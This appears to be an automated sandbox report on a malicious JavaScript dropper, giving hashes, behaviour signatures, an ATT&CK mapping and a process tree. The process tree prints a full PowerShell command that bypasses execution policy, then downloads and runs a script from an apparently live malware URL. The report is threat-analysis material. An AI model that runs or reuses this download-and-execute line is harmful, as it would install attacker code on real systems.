048d9066018698dd3437257bb720c9684a094961f32dd4e0bd89213089e71c01

Analysis

max time kernel
121s
max time network
124s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
04-03-2024 16:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DE-97799779.js
Size

67KB
MD5

7b61b436fb45377911dff797b06dc189
SHA1

07e8e12694f11b13a14b12aee585a39fad733018
SHA256

048d9066018698dd3437257bb720c9684a094961f32dd4e0bd89213089e71c01
SHA512

a28c3d2940ffeef3dfc74e1af5f83fe65a794c3ce3d45b9f3955a676332c958f7a116d37a64321854f58651e5aaabde0ba1fc1a90401dd2796ecc4d6974e3690
SSDEEP

1536:Gz5KAGyA3MklCxbS0uncLUysuYmPazQ51reEBqYADuCuERGR2Mgi7iPFz+S8:GzKd2vsuYmWehADuCuERGzg3z+S8

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://compactgrill.hu/care.txt

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
3	2076	powershell.exe
4	2076	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2076	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2076	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2244 wrote to memory of 2076	2244	wscript.exe	28
PID 2244 wrote to memory of 2076	2244	wscript.exe	28
PID 2244 wrote to memory of 2076	2244	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\DE-97799779.js
1⤵
- Suspicious use of WriteProcessMemory
PID:2244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2076

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2076-4-0x000000001B240000-0x000000001B522000-memory.dmp

Filesize
2.9MB

Download
memory/2076-5-0x0000000002590000-0x0000000002598000-memory.dmp

Filesize
32KB

Download
memory/2076-6-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-7-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2076-8-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download
memory/2076-9-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-10-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

Filesize
9.6MB

Download
memory/2076-11-0x0000000002890000-0x0000000002910000-memory.dmp

Filesize
512KB

Download